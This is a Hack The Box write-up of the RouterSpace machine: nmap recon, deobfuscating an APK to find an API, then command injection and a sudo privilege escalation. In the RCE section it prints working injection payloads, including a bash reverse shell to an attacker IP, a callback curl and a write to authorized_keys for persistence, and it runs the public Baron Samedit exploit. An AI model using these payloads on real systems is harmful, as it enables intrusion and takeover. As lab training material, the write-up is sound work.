# RouterSpace - HTB

[[_TOC_]]

# Summary

<div align="center"><img width="560" height="424" src="images/0.png"></div>

RouterSpace was an easy-rated, fun HTB machine created by [@h4rithd](https://twitter.com/h4rithd)

For foothold, the intended approach was to install the APK file from the website and intercept the requests it makes. The requests would leak an API endpoint and the headers needed to access it. We could make POST requests to that endpoint and inject OS commands to get RCE as the user.

While attempting the box, I could not set up the environment/emulator needed to capture the requests and had to reverse the APK. That reversing approach is presented in this article.

Once on the box, we were expected to find an unpatched version of `sudo` running on the machine, which is vulnerable to CVE-2021-3156, a heap based buffer overflow (Baron Samedit), which can be leveraged to get root shell on the box.

# Initial Recon

## `nmap`

```console
opcode@parrot$ nmap -p- --min-rate 5000 10.10.11.148
Nmap scan report for 10.10.11.148
Host is up (0.17s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
```

```console
opcode@parrot$ nmap -sC -sV -p 22,80 -oN routerspace.nmap 10.10.11.148
Nmap scan report for 10.10.11.148
Host is up (0.39s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     (protocol 2.0)
| fingerprint-strings: 
|   NULL: 
|_    SSH-2.0-RouterSpace Packet Filtering V1
| ssh-hostkey: 
|   3072 f4:e4:c8:0a:a6:af:66:93:af:69:5a:a9:bc:75:f9:0c (RSA)
|   256 7f:05:cd:8c:42:7b:a9:4a:b2:e6:35:2c:c4:59:78:02 (ECDSA)
|_  256 2f:d7:a8:8b:be:2d:10:b0:c9:b4:29:52:a8:94:24:78 (ED25519)
80/tcp open  http
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.1 200 OK
|     X-Powered-By: RouterSpace
|     X-Cdn: RouterSpace-78419
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 68
|     ETag: W/"44-38M0I2gp1vhKErvQwMlxREdlt1E"
|     Date: Sat, 26 Feb 2022 19:15:12 GMT
|     Connection: close
|     Suspicious activity detected !!! {RequestID: Tk 5 O2 IQ iUT h }
|   GetRequest: 
|     HTTP/1.1 200 OK
|     X-Powered-By: RouterSpace
|     X-Cdn: RouterSpace-76562
|     Accept-Ranges: bytes
|     Cache-Control: public, max-age=0
|     Last-Modified: Mon, 22 Nov 2021 11:33:57 GMT
|     ETag: W/"652c-17d476c9285"
|     Content-Type: text/html; charset=UTF-8
|     Content-Length: 25900
|     Date: Sat, 26 Feb 2022 19:15:09 GMT
|     Connection: close
|     <!doctype html>
|     <html class="no-js" lang="zxx">
|     <head>
|     <meta charset="utf-8">
|     <meta http-equiv="x-ua-compatible" content="ie=edge">
|     <title>RouterSpace</title>
|     <meta name="description" content="">
|     <meta name="viewport" content="width=device-width, initial-scale=1">
|     <link rel="stylesheet" href="css/bootstrap.min.css">
|     <link rel="stylesheet" href="css/owl.carousel.min.css">
|     <link rel="stylesheet" href="css/magnific-popup.css">
|     <link rel="stylesheet" href="css/font-awesome.min.css">
|     <link rel="stylesheet" href="css/themify-icons.css">
|   HTTPOptions: 
|     HTTP/1.1 200 OK
|     X-Powered-By: RouterSpace
|     X-Cdn: RouterSpace-29299
|     Allow: GET,HEAD,POST
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 13
|     ETag: W/"d-bMedpZYGrVt1nR4x+qdNZ2GqyRo"
|     Date: Sat, 26 Feb 2022 19:15:09 GMT
|     Connection: close
|     GET,HEAD,POST
|   RTSPRequest, X11Probe: 
|     HTTP/1.1 400 Bad Request
|_    Connection: close
|_http-title: RouterSpace
|_http-trane-info: Problem with XML parsing of /evox/about
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
[--SNIP--]
```

Only SSH and HTTP ports are open on this machine.

## Exploring the website:

Upon visiting http://10.10.11.148/ in the browser, we are greeted with the landing page:

![1](images/1.jpg)

No URL on the webpage works, except for http://10.10.11.148/RouterSpace.apk, which downloads an APK file.

Trying gobuster does not get us anywhere; we keep getting these:
```
Suspicious activity detected !!! {RequestID: jWfmz 8 SJ o 5 SeD G p }
```

## Reversing the APK

I tried to use couple emulators to run the android application, but one didn't install properly, and the requests made by the other weren't getting intercepted.  
In the end, I tried to run the app on my phone and got this:

![2](images/2.jpg)

Clicking the "Check Status" button shows this error:

![3](images/3.jpg)

Notice the typo in the error message: `Unable to connet to the server!`

Instead of trying to fix the emulator issues, I decided to reverse the APK.  
First, I used `apktool` to unpack the APK and decode the resources:
```
apktool d RouterSpace.apk
```

Inside `smali/com`, we can see:
```console
opcode@parrot$ ls smali/com            
facebook  google  routerspace  swmansion  th3rdwave
```

That **facebook** directory indicates it might have been built with **React Native**. The **swmansion** directory supplements this notion as their github is filled with many react native projects (https://github.com/software-mansion).

For react native applications, the entire source is bundled and placed in `assets/index.android.bundle`.
```console
opcode@parrot$ ls assets/            
fonts  index.android.bundle
```

Now, let's decompile this file with [react-native-decompiler](https://github.com/nomi9995/react-native-decompiler):
```
npx react-native-decompiler -i ./index.android.bundle -o ./output
```

A total of 731 `.js` files were generated in the output directory, with some errors along the way.

Remember the typo in the error message? Let's grep for it:
```console
opcode@parrot$ grep -rno 'connet'
540.js:139:connet
null.cache:1:connet
null.cache:1:connet
```

That 540.js is the file of interest. This is how it partly looks like:
```js
function _0x3f1b(_0x32ad91, _0x55c7ed) {
  var _0x561355 = _0x31d2();

  _0x3f1b = function (_0x4ec447, _0x28fd76) {
    _0x4ec447 = _0x4ec447 - (0x3d * -0x9e + 0x1 * -0xaad + 0x30ee * 0x1);
    var _0x41f779 = _0x561355[_0x4ec447];
    return _0x41f779;
  };

  return _0x3f1b(_0x32ad91, _0x55c7ed);
}

var _0x47a8f2 = _0x3f1b;

(function (_0x506418, _0x1f605c) {
  var _0x30a08d = _0x3f1b,
    _0x55f539 = _0x506418();

  while (!![]) {
    try {
      var _0xf72415 =
        -parseInt(_0x30a08d(0xd0)) / (0x135d * 0x1 + 0x56d + -0x4f5 * 0x5) +
        (parseInt(_0x30a08d(0xe4)) / (-0x1 * -0x1db7 + -0x1 * 0x1ab7 + -0x2fe * 0x1)) * (-parseInt(_0x30a08d(0xae)) / (0x1ab * -0xd + 0x1b35 + -0x583)) +
        (-parseInt(_0x30a08d(0xef)) / (-0x209f * -0x1 + 0x23b * 0x1 + -0xd * 0x2ae)) * (parseInt(_0x30a08d(0xbb)) / (-0x96a + 0x74a * 0x1 + 0x1 * 0x225)) +
        (parseInt(_0x30a08d(0xe5)) / (-0xcfb + 0x3 * -0x29 + -0x35f * -0x4)) * (parseInt(_0x30a08d(0xa0)) / (0x8c6 + -0xf7 * 0x1d + 0x133c)) +
        -parseInt(_0x30a08d(0xd9)) / (0x19ba + -0x1521 + 0x491 * -0x1) +
        -parseInt(_0x30a08d(0xe6)) / (0x68f * 0x2 + 0x1d96 + 0x1 * -0x2aab) +
        (-parseInt(_0x30a08d(0xfa)) / (-0x1364 + 0x21c7 * -0x1 + 0x101 * 0x35)) * (-parseInt(_0x30a08d(0xf6)) / (0x15 * -0xc1 + 0x1f * -0xe8 + -0x218 * -0x15));
[--SNIP--]
```

It has been obfuscated.

Using https://deobfuscate.io/ I got slightly better code, but the readability is still poor.  
I unchecked the "Rename Hex Identifiers" option because I prefer hex names over random unrelated names for variables and functions.  
As far as I can tell, it resolves the mathematical expressions, and gets rid of unnecessary newlines.  
It still looks like a mess, but can be resolved by breaking it down into smaller chunks. This is something you'd see a lot in older CTF challenges involving JavaScript obfuscation.  
```js
function _0x3f1b(_0x32ad91, _0x55c7ed) {
  var _0x561355 = _0x31d2();
  _0x3f1b = function (_0x4ec447, _0x28fd76) {
    _0x4ec447 = _0x4ec447 - 155;
    var _0x41f779 = _0x561355[_0x4ec447];
    return _0x41f779;
  };
  return _0x3f1b(_0x32ad91, _0x55c7ed);
}
var _0x47a8f2 = _0x3f1b;
(function (_0x506418, _0x1f605c) {
  var _0x30a08d = _0x3f1b, _0x55f539 = _0x506418();
  while (true) {
    try {
      var _0xf72415 = -parseInt(_0x30a08d(208)) / 1 + parseInt(_0x30a08d(228)) / 2 * (-parseInt(_0x30a08d(174)) / 3) + -parseInt(_0x30a08d(239)) / 4 * (parseInt(_0x30a08d(187)) / 5) + parseInt(_0x30a08d(229)) / 6 * (parseInt(_0x30a08d(160)) / 7) + -parseInt(_0x30a08d(217)) / 8 + -parseInt(_0x30a08d(230)) / 9 + -parseInt(_0x30a08d(250)) / 10 * (-parseInt(_0x30a08d(246)) / 11);
      if (_0xf72415 === _0x1f605c) break; else _0x55f539.push(_0x55f539.shift());
    } catch (_0x91a71d) {
      _0x55f539.push(_0x55f539.shift());
    }
  }
}(_0x31d2, 548277));
var t = require(d[0]);
Object[_0x47a8f2(210) + _0x47a8f2(223)](exports, _0x47a8f2(179), {value: true});
exports[_0x47a8f2(202)] = void 0;
function _0x31d2() {
  var _0x379495 = ["EwCVL", "ugPGw", "Router is ", "-Bold", "data", "30158095HXLvSs", "post", "eAgent", "http://rou", "10BrHGoD", "gray", "80%", "applicatio", "white", "ck your in", "ternet con", "tb/api/v4/", "Please pro", "Image", "XvhFJ", "2111347AIyazK", "v/check/de", "vide an IP", "working fi", "DKyDg", "YnNsf", "tzoEq", "EKNxl", "the server", "log", "ne!.", "NunitoSans", "OgZoU", "TouchableO", "32457sfggQZ", "nection.", "[ RESPOND ", "center", "createElem", "__esModule", "per", "mGNnc", "then", "catch", "contain", "uAiCt", "bottom", "42740dmWhFN", "Text", "ButtonWrap", "OLDvc", "Sorry !", "terspace.h", "n/json", "StyleSheet", "/router/de", "darkgray", "JHvFI", "transparen", "UWIVj", "Please che", "SZqEq", "default", "HrHYj", "Hey !", "monitoring", "StatusBar", "error", "1013605BwxVJG", "[ DEBUG ] ", "defineProp", "gUnlE", "Unable to ", "25%", "pacity", "ButtonText", "gKQYs", "1006000MsdmAT", "handleSubm", "PpdRl", "shxxV", "ent", "View", "erty", "show", "Formik", "Check Stat", "0.0.0.0", "128BJBUSC", "6BAxhAU", "4584186MTHGwP", "connet to ", "vESlr", "GHjuW", " Address.", "container", "create", "RouterSpac", "viceAccess", "72dIvHGU", "info"];
  _0x31d2 = function () {
    return _0x379495;
  };
  return _0x31d2();
}
[--SNIP--]
```

These three functions are the key to deobfuscating this mess. I started by replacing the hex identifiers with something meaningful.  
Replaced `_0x379495` with `values`, `_0x31d2` with `lookup`.

Note that the function at the top seems to be using it, returning the (arg-155)th item from lookup array. Therefore, I replaced `_0x3f1b` with `shiftBy155`, `_0x561355` with `values`, `_0x4ec447` with `index` and `_0x41f779` with `value`.

```js
function lookup() {
  var values = ["EwCVL", "ugPGw", "Router is ", "-Bold", "data", "30158095HXLvSs", "post", "eAgent", "http://rou", "10BrHGoD", "gray", "80%", "applicatio", "white", "ck your in", "ternet con", "tb/api/v4/", "Please pro", "Image", "XvhFJ", "2111347AIyazK", "v/check/de", "vide an IP", "working fi", "DKyDg", "YnNsf", "tzoEq", "EKNxl", "the server", "log", "ne!.", "NunitoSans", "OgZoU", "TouchableO", "32457sfggQZ", "nection.", "[ RESPOND ", "center", "createElem", "__esModule", "per", "mGNnc", "then", "catch", "contain", "uAiCt", "bottom", "42740dmWhFN", "Text", "ButtonWrap", "OLDvc", "Sorry !", "terspace.h", "n/json", "StyleSheet", "/router/de", "darkgray", "JHvFI", "transparen", "UWIVj", "Please che", "SZqEq", "default", "HrHYj", "Hey !", "monitoring", "StatusBar", "error", "1013605BwxVJG", "[ DEBUG ] ", "defineProp", "gUnlE", "Unable to ", "25%", "pacity", "ButtonText", "gKQYs", "1006000MsdmAT", "handleSubm", "PpdRl", "shxxV", "ent", "View", "erty", "show", "Formik", "Check Stat", "0.0.0.0", "128BJBUSC", "6BAxhAU", "4584186MTHGwP", "connet to ", "vESlr", "GHjuW", " Address.", "container", "create", "RouterSpac", "viceAccess", "72dIvHGU", "info"];
  lookup = function () {
    return values;
  };
  return lookup();
}
```
This function `lookup()` takes the argument as an index and returns a value from the lookup array corresponding to that index.

```js
function shiftBy155(_0x32ad91, _0x55c7ed) {
  var values = lookup();
  shiftBy155 = function (index, _0x28fd76) {
    index = index - 155;
    var value = values[index];
    return value;
  };
  return shiftBy155(_0x32ad91, _0x55c7ed);
}
```
`shiftBy155` is the same as `lookup`, except it returns the (argument-155)th value from the lookup array.

```js
(function (_0x506418, _0x1f605c) {
  var _0x30a08d = shiftBy155, _0x55f539 = _0x506418();
  while (true) {
    try {
      var _0xf72415 = -parseInt(_0x30a08d(208)) / 1 + parseInt(_0x30a08d(228)) / 2 * (-parseInt(_0x30a08d(174)) / 3) + -parseInt(_0x30a08d(239)) / 4 * (parseInt(_0x30a08d(187)) / 5) + parseInt(_0x30a08d(229)) / 6 * (parseInt(_0x30a08d(160)) / 7) + -parseInt(_0x30a08d(217)) / 8 + -parseInt(_0x30a08d(230)) / 9 + -parseInt(_0x30a08d(250)) / 10 * (-parseInt(_0x30a08d(246)) / 11);
      if (_0xf72415 === _0x1f605c) break; else _0x55f539.push(_0x55f539.shift());
    } catch (_0x91a71d) {
      _0x55f539.push(_0x55f539.shift());
    }
  }
}(lookup, 548277));
```
This one is a `while(true)` loop which keeps running until a specific condition is satisfied. It is slightly more complicated than the other two.

Let us look at what the `parseInt()` function does. This function parses a string argument and returns an integer of the specified radix (10 by default).  
But just like everything else in JavaScript, it has quirks of its own:

![4](images/4.png)

Note that it determines whether the provided string argument is a number or not based on the first character. As a result, even if the string contains other characters, as long as the first character is a valid integer: it would parse out the integer part at the beginning.  
In python, a function with an equivalent behavior can be written as:  
```py
from re import search

def _parseInt(s):
    n = search(r'\d+', s)
    return int(n[0])
```
(Please message me on Discord if an identical built-in python function exists)

Let's look at that `while(true)` loop. It uses `parseInt()` on certain items of the lookup array and does some maths with the obtained values. If the value of that expression equals 548277, it breaks.  
Otherwise, it would do a `lookup.push(lookup.shift())` operation on the lookup array. Think of it as rotating the array by one unit.

An equivalent python implementation would look like this:
```py
from re import search

def _parseInt(s):
    n = search(r'\d+', s)
    return int(n[0])

def rotate(values):
    values.append(values.pop(0))
    return values

def lookup(i):
    return values[i-155]

values = ["EwCVL", "ugPGw", "Router is ", "-Bold", "data", "30158095HXLvSs", "post", "eAgent",
          "http://rou", "10BrHGoD", "gray", "80%", "applicatio", "white", "ck your in",
          "ternet con", "tb/api/v4/", "Please pro", "Image", "XvhFJ", "2111347AIyazK",
          "v/check/de", "vide an IP", "working fi", "DKyDg", "YnNsf", "tzoEq", "EKNxl",
          "the server", "log", "ne!.", "NunitoSans", "OgZoU", "TouchableO", "32457sfggQZ",
          "nection.", "[ RESPOND ", "center", "createElem", "__esModule", "per", "mGNnc",
          "then", "catch", "contain", "uAiCt", "bottom", "42740dmWhFN", "Text", "ButtonWrap",
          "OLDvc", "Sorry !", "terspace.h", "n/json", "StyleSheet", "/router/de", "darkgray",
          "JHvFI", "transparen", "UWIVj", "Please che", "SZqEq", "default", "HrHYj", "Hey !",
          "monitoring", "StatusBar", "error", "1013605BwxVJG", "[ DEBUG ] ", "defineProp",
          "gUnlE", "Unable to ", "25%", "pacity", "ButtonText", "gKQYs", "1006000MsdmAT",
          "handleSubm", "PpdRl", "shxxV", "ent", "View", "erty", "show", "Formik", "Check Stat",
          "0.0.0.0", "128BJBUSC", "6BAxhAU", "4584186MTHGwP", "connet to ", "vESlr", "GHjuW",
          " Address.", "container", "create", "RouterSpac", "viceAccess", "72dIvHGU", "info"]

while True:
    try:
        result = -_parseInt(lookup(208)) / 1 + _parseInt(lookup(228)) / 2 * (-_parseInt(lookup(174)) / 3) + \
            -_parseInt(lookup(239)) / 4 * (_parseInt(lookup(187)) / 5) + _parseInt(lookup(229)) / 6 * \
            (_parseInt(lookup(160)) / 7) + -_parseInt(lookup(217)) / 8 + -_parseInt(lookup(230)) / 9 + - \
            _parseInt(lookup(250)) / 10 * (-_parseInt(lookup(246)) / 11)
        if result == 548277.0:
            break
    except TypeError:
        rotate(values)
        continue
```
We can find the correct permutation of items in the array by running this script.

Hence, we now know how to replace all those function calls with strings from the lookup array.  
There might be a better way to do this, but I wrote a messy python script to replace them all with regex. (Please message me on Discord if you have an elegant way to do it)

```py
from re import sub

with open('540.js', 'r') as f:
    doc = f.read()


def re_op(matchobj):
    m = int(matchobj.group(1))
    return '"' + lookup(m) + '"'


replacables = ['_0x32f76d', '_0x36a162', '_0x8054be',
               '_0x3f41d2', '_0x155ca5', '_0x47a8f2']

for i in replacables:
    pattern = f'{i}' + '\(([0-9]{2,3})\)'
    doc = sub(pattern, re_op, doc)

with open('resolved.js', 'w') as g:
    g.write(doc)
```

The full script can be found [here](deobfuscate1.py)

After getting rid of those three functions, we can put the result again on https://deobfuscate.io/ so that the string concatenations get resolved:
```js
var t = require(d[0]);
Object.defineProperty(exports, "__esModule", {value: true});
exports.default = void 0;
var n = t(require(d[1])), o = t(require(d[2])), l = require(d[3]), u = t(require(d[4])), c = t(require(d[5])), s = t(require(d[6])), f = t(require(d[7])), h = require(d[8]), p = function () {
  var _0x32f76d = _0x47a8f2, _0x1f5205 = {gUnlE: "info", uAiCt: "Hey !", PpdRl: "Router is working fine!.", JHvFI: "[ DEBUG ] Router is working fine!.", vESlr: function (_0x4f848e, _0xcfdf5c) {
    return _0x4f848e + _0xcfdf5c;
  }, SZqEq: "[ RESPOND ] ", EKNxl: "error", DKyDg: "Unable to connet to the server !", XvhFJ: "Please check your internet connection.", shxxV: "[ DEBUG ] Please check your internet connection.", OgZoU: function (_0x38d154, _0x48711d) {
    return _0x38d154 == _0x48711d;
  }, mGNnc: "Sorry !", HrHYj: "Please provide an IP Address.", tzoEq: "[ DEBUG ] Please provide an IP Address.", EwCVL: "http://routerspace.htb/api/v4/monitoring/router/dev/check/deviceAccess", ugPGw: "RouterSpaceAgent", UWIVj: "application/json", OLDvc: "transparent", gKQYs: "Check Status", YnNsf: "bottom", GHjuW: "0.0.0.0"};
  return n.default.createElement(h.View, {style: {flex: 1}}, n.default.createElement(u.default, {position: _0x1f5205.YnNsf, bottomOffset: 20}), n.default.createElement(s.default, null, n.default.createElement(l.Formik, {initialValues: {ip: _0x1f5205.GHjuW}, onSubmit: function (_0x2c3ea5) {
    var _0x36a162 = _0x32f76d, _0x39f1a7;
    if (_0x1f5205.OgZoU("", _0x2c3ea5.ip)) {
      u.default.show({type: _0x1f5205.EKNxl, text1: _0x1f5205.mGNnc, text2: _0x1f5205.HrHYj});
      console.log(_0x1f5205.tzoEq);
    } else {
      _0x39f1a7 = _0x2c3ea5;
      o.default.post(_0x1f5205.EwCVL, _0x39f1a7, {headers: {"User-Agent": _0x1f5205.ugPGw, "Content-Type": _0x1f5205.UWIVj}}).then(function (_0x54b285) {
        var _0x8054be = _0x36a162;
        u.default.show({type: _0x1f5205.gUnlE, text1: _0x1f5205.uAiCt, text2: _0x1f5205.PpdRl});
        console.log(_0x1f5205.JHvFI);
        var _0x4c7303 = _0x54b285.data;
        console.log(_0x1f5205.vESlr(_0x1f5205.SZqEq, _0x4c7303));
      }).catch(function (_0x426a6b) {
        var _0x3f41d2 = _0x36a162;
        u.default.show({type: _0x1f5205.EKNxl, text1: _0x1f5205.DKyDg, text2: _0x1f5205.XvhFJ});
        console.log(_0x1f5205.shxxV);
      });
    }
  }}, function (_0x589cc4) {
    var _0x155ca5 = _0x32f76d, _0x5ae3ee = _0x589cc4.handleSubmit;
    return n.default.createElement(h.View, {style: y.container}, n.default.createElement(h.StatusBar, {translucent: true, backgroundColor: _0x1f5205.OLDvc}), n.default.createElement(h.Image, {source: c.default, style: y.Image}), n.default.createElement(h.TouchableOpacity, {style: y.ButtonWrapper, onPress: _0x5ae3ee}, n.default.createElement(h.Text, {style: y.ButtonText}, _0x1f5205.gKQYs)));
  })));
};
exports.default = p;
var y = h.StyleSheet.create({container: {flex: 1, marginTop: "25%", alignItems: "center", justifyContent: "center"}, Image: {justifyContent: "center", alignItems: "center", resizeMode: "contain", width: 300, height: 300}, ButtonWrapper: {width: "80%", backgroundColor: f.default.darkgray, alignItems: "center", justifyContent: "center", marginVertical: 15, borderRadius: 10, height: 50, marginBottom: 20, padding: 20}, ButtonText: {paddingTop: 28, height: 80, color: "white", fontSize: 20, fontFamily: "NunitoSans-Bold"}, inputView: {width: "80%", backgroundColor: f.default.gray, borderRadius: 10, height: 50, marginBottom: 20, justifyContent: "center", padding: 20}, inputText: {height: 80, color: f.default.darkgray}});
``` 

It isn't over. There is another replacement we need to go through.  
The `_0x1f5205` object contains a bunch of key-value pairs that we need to replace as well.  
First, we should look at the two functions in there.  
The first function `vESlr` is used in the line:
```js
console.log(_0x1f5205.vESlr(_0x1f5205.SZqEq, _0x4c7303));
```
I replaced it with:
```js
console.log("[ RESPOND ] " + _0x4c7303);
```
The second function `OgZoU` is used in the line:
```js
if (_0x1f5205.OgZoU("", _0x2c3ea5.ip)) {
```
I replaced it with:
```js
if ("" == _0x2c3ea5.ip) {
```

Next, I made another messy python script to replace with strings from `_0x1f5205`.

```py
from re import sub


with open('resolved.js', 'r') as f:
    doc = f.read()


str_dict = {
    'gUnlE': "info",
    'uAiCt': "Hey !",
    'PpdRl': "Router is working fine!.",
    'JHvFI': "[ DEBUG ] Router is working fine!.",
    'SZqEq': "[ RESPOND ] ",
    'EKNxl': "error",
    'DKyDg': "Unable to connet to the server !",
    'XvhFJ': "Please check your internet connection.",
    'shxxV': "[ DEBUG ] Please check your internet connection.",
    'mGNnc': "Sorry !",
    'HrHYj': "Please provide an IP Address.",
    'tzoEq': "[ DEBUG ] Please provide an IP Address.",
    'EwCVL': "http://routerspace.htb/api/v4/monitoring/router/dev/check/deviceAccess",
    'ugPGw': "RouterSpaceAgent",
    'UWIVj': "application/json",
    'OLDvc': "transparent",
    'gKQYs': "Check Status",
    'YnNsf': "bottom",
    'GHjuW': "0.0.0.0",
}

for i in str_dict:
    pattern = '_0x1f5205.' + i
    repl = '"' + str_dict[i] + '"'
    doc = sub(pattern, repl, doc)

with open('final.js', 'w') as g:
    g.write(doc)
```

The script can also be found [here](deobfuscate2.py)

We can now remove the `_0x1f5205` object and use `prettier` to format it nicely.  
At this point, the code is very readable, and we can move forward on the box. We can still go ahead and guess the imports: there's `React` from `react`, and a bunch of imports from `react-native` (Stylesheet, Button, Text, View...), `Formik` from `formik`, `NavigationContainer` from `react-navigation` and so on...  
One could look at template projects and modify this one to match them, but it's overkill honestly.

Currently, we have the application:
```js
var t = require(d[0]);
Object.defineProperty(exports, "__esModule", { value: true });
exports.default = void 0;
var n = t(require(d[1])),
  o = t(require(d[2])),
  l = require(d[3]),
  u = t(require(d[4])),
  c = t(require(d[5])),
  s = t(require(d[6])),
  f = t(require(d[7])),
  h = require(d[8])

    return n.default.createElement(
      h.View,
      { style: { flex: 1 } },
      n.default.createElement(u.default, {
        position: "bottom",
        bottomOffset: 20,
      }),
      n.default.createElement(
        s.default,
        null,
        n.default.createElement(
          l.Formik,
          {
            initialValues: { ip: "0.0.0.0" },
            onSubmit: function (_0x2c3ea5) {
              var _0x36a162 = _0x32f76d,
                _0x39f1a7;
              if ("" == _0x2c3ea5.ip) {
                u.default.show({
                  type: "error",
                  text1: "Sorry !",
                  text2: "Please provide an IP Address.",
                });
                console.log("[ DEBUG ] Please provide an IP Address.");
              } else {
                _0x39f1a7 = _0x2c3ea5;
                o.default
                  .post(
                    "http://routerspace.htb/api/v4/monitoring/router/dev/check/deviceAccess",
                    _0x39f1a7,
                    {
                      headers: {
                        "User-Agent": "RouterSpaceAgent",
                        "Content-Type": "application/json",
                      },
                    }
                  )
                  .then(function (_0x54b285) {
                    var _0x8054be = _0x36a162;
                    u.default.show({
                      type: "info",
                      text1: "Hey !",
                      text2: "Router is working fine!.",
                    });
                    console.log("[ DEBUG ] Router is working fine!.");
                    var _0x4c7303 = _0x54b285.data;
                    console.log(_0x1f5205.vESlr("[ RESPOND ] ", _0x4c7303));
                  })
                  .catch(function (_0x426a6b) {
                    var _0x3f41d2 = _0x36a162;
                    u.default.show({
                      type: "error",
                      text1: "Unable to connet to the server !",
                      text2: "Please check your internet connection.",
                    });
                    console.log(
                      "[ DEBUG ] Please check your internet connection."
                    );
                  });
              }
            },
          },
          function (_0x589cc4) {
            var _0x155ca5 = _0x32f76d,
              _0x5ae3ee = _0x589cc4.handleSubmit;
            return n.default.createElement(
              h.View,
              { style: y.container },
              n.default.createElement(h.StatusBar, {
                translucent: true,
                backgroundColor: "transparent",
              }),
              n.default.createElement(h.Image, {
                source: c.default,
                style: y.Image,
              }),
              n.default.createElement(
                h.TouchableOpacity,
                { style: y.ButtonWrapper, onPress: _0x5ae3ee },
                n.default.createElement(
                  h.Text,
                  { style: y.ButtonText },
                  "Check Status"
                )
              )
            );
          }
        )
      )
    );
  };
exports.default = p;
var y = h.StyleSheet.create({
  container: {
    flex: 1,
    marginTop: "25%",
    alignItems: "center",
    justifyContent: "center",
  },
  Image: {
    justifyContent: "center",
    alignItems: "center",
    resizeMode: "contain",
    width: 300,
    height: 300,
  },
  ButtonWrapper: {
    width: "80%",
    backgroundColor: f.default.darkgray,
    alignItems: "center",
    justifyContent: "center",
    marginVertical: 15,
    borderRadius: 10,
    height: 50,
    marginBottom: 20,
    padding: 20,
  },
  ButtonText: {
    paddingTop: 28,
    height: 80,
    color: "white",
    fontSize: 20,
    fontFamily: "NunitoSans-Bold",
  },
  inputView: {
    width: "80%",
    backgroundColor: f.default.gray,
    borderRadius: 10,
    height: 50,
    marginBottom: 20,
    justifyContent: "center",
    padding: 20,
  },
  inputText: { height: 80, color: f.default.darkgray },
});
```

## Remote Code Execution

After looking at the source code, we can conclude that this page is a form with an input field: IP address and upon submitting the form, it makes a POST request to http://routerspace.htb/api/v4/monitoring/router/dev/check/deviceAccess with the headers `User-Agent: RouterSpaceAgent` and `Content-Type: application/json`.

But first, add this line to `/etc/hosts`:
```
10.10.11.148 routerspace.htb
```

Making a curl request, we get:
```console
opcode@parrot$ curl -X POST -A 'RouterSpaceAgent' -H 'Content-Type: application/json' 'http://routerspace.htb/api/v4/monitoring/router/dev/check/deviceAccess'
"undefined\n"%
```

We can add data: `ip: "0.0.0.0"`

```console
opcode@parrot$ curl -X POST -A 'RouterSpaceAgent' -H 'Content-Type: application/json' 'http://routerspace.htb/api/v4/monitoring/router/dev/check/deviceAccess' -d '{"ip":"0.0.0.0"}'
"0.0.0.0\n"
```
It sent the IP value from the request back in response.  
Next, I tried command injection:
```console
opcode@parrot$ curl -X POST -A 'RouterSpaceAgent' -H 'Content-Type: application/json' 'http://routerspace.htb/api/v4/monitoring/router/dev/check/deviceAccess' -d '{"ip":"$(id)"}'
"uid=1001(paul) gid=1001(paul) groups=1001(paul)\n"
```
And success!

We have access to the user and can grab the flag. But sadly, there isn't any private key to grab from `/home/paul/.ssh`. So, I tried a reverse shell:
```
curl -X POST -A 'RouterSpaceAgent' -H 'Content-Type: application/json' 'http://routerspace.htb/api/v4/monitoring/router/dev/check/deviceAccess' -d '{"ip":"$(bash -c \"bash -i >& /dev/tcp/10.10.14.54/9001 0>&1\")"}'
```
It didn't work for some reason. I also tried curling to myself:
```
curl -X POST -A 'RouterSpaceAgent' -H 'Content-Type: application/json' 'http://routerspace.htb/api/v4/monitoring/router/dev/check/deviceAccess' -d '{"ip":"$(curl 10.10.14.54:9001)"}'
```
It didn't work either.

Perhaps a WAF is in place.  
Finally I generated a SSH key on my system and transferred it to the box:
```
ssh-keygen -t ecdsa -N '' -f ~/paul
```

```
curl -X POST -A 'RouterSpaceAgent' -H 'Content-Type: application/json' 'http://routerspace.htb/api/v4/monitoring/router/dev/check/deviceAccess' -d '{"ip":"$(echo \"ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBLhaDWZGtJJBa/dcgLCWkmOPy+rjnOI7owxDOASoDJj7bDakFdWBP/nz5odP0BslaNCFbnB4JNs2rPr9xq3M5y0= opcode@opcode-parrot\" > /home/paul/.ssh/authorized_keys)"}'
```

Now, we can SSH to the box with:
```
ssh -i paul paul@routerspace.htb
```

## Privilege Escalation

In `/opt/www/public/routerspace/index.js`, we have:
```js
var express = require("express");
const path = require("path");
const app = express();
const { check, oneOf, validationResult } = require("express-validator");
const promisify = require('util').promisify;

const port = 80;
const tokenSecret = "v%XsfkyZ#2SsfY9F--ippsec.rocks--x0o^VvYSRCw$5#MKi5";
const userAgent = "RouterSpaceAgent";
const payload = [
  "paul@routerspace.htb",
  "*******************",
  "Hyakutake-0x1",
];
[--SNIP--]
```
I couldn't find a way to use these. The credentials or the `tokenSecret` can be used to get another token, but it isn't really used anywhere.

Instead, we can transfer `linpeas` and `pspy` to the box to do the usual enumeration.
Since there is a WAF, we need to use `scp` to transfer files:
```
scp -i paul linpeas.sh paul@routerspace.htb:/tmp
```
There isn't any anomaly which stands out from the linpeas result.  
Grasping at straws, we can take a look at the "Linux Exploit Suggester" section in the linpeas output:

![5](images/5.png)

I tried couple `pwnkit` exploits, but they didn't work on this box.  
Next, I decided to try the `sudo Baron Samedit` exploit. We can find more info about it here: https://blog.qualys.com/vulnerabilities-threat-research/2021/01/26/cve-2021-3156-heap-based-buffer-overflow-in-sudo-baron-samedit  
In order to check if `sudo` is vulnerable, we can simply run this command:
```
sudoedit -s 'AAAAAAAA\'
```
If it were vulnerable, we would get an error message containing the words: "memory corruption".  
But we don't have the credentials, so we cannot see the error. We need to try the exploit instead.  
I decided to try the exploit from https://github.com/blasty/CVE-2021-3156

After transferring it to the box:
```
paul@routerspace:/tmp$ make
rm -rf libnss_X
mkdir libnss_X
gcc -std=c99 -o sudo-hax-me-a-sandwich hax.c
gcc -fPIC -shared -o 'libnss_X/P0P_SH3LLZ_ .so.2' lib.c
```

```
paul@routerspace:/tmp$ ./sudo-hax-me-a-sandwich 1
